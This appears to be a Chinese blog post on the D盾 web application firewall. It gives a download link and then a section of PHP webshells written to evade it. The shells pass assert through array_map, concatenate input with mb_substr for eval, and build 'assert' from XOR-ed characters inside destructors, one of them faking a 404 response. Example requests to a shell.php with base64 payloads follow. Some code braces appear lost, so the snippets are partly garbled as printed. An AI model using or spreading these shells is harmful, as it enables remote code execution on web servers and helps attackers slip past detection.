应用安全-安全设备-Waf系列-软Waf-D盾

Posted 2022-07-14 atesetenginner

安装

下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map |  assert

<?php 
function test($a, $b)

    array_map($a, $b);

test(assert, array($_POST[‘x‘]));
?> 

mb_substr

<?php
$m=$_GET[‘1‘];
$a=mb_substr($m,0,1); 
$b=mb_substr($m,1,9999);
eval($a.$b);
?>

PHP一句话

class LTDS

    public function __destruct()
    
        $bxo=‘X‘^"\x39";
        $woa=‘?‘^"\x4c";
        $ukt=‘K‘^"\x38";
        $gud=‘d‘^"\x1";
        $fbu=‘_‘^"\x2d";
        $agx=‘<‘^"\x48";
        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
        return @$HLWV($this->OX);
    

$ltds=new LTDS();
@$ltds->OX=isset($_GET[‘id‘])?base64_decode($_POST[‘ua8‘]):$_POST[‘ua8‘];

http://www.xxx.com/shell.php  
POST: ua8=phpinfo();  //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

异或 | PHP一句话

<?php 
header(‘HTTP/1.1 404‘);
class ZXVG

    public $c=‘‘;
    public function __destruct()
    
        $_0=‘&‘^"\x47";
        $_1=‘C‘^"\x30";
        $_2=‘A‘^"\x32";
        $_3=‘v‘^"\x13";
        $_4=‘J‘^"\x38";
        $_5=‘f‘^"\x12";
        $db=$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    

$zxvg=new ZXVG();
@$zxvg->c=$_POST[‘mr6‘];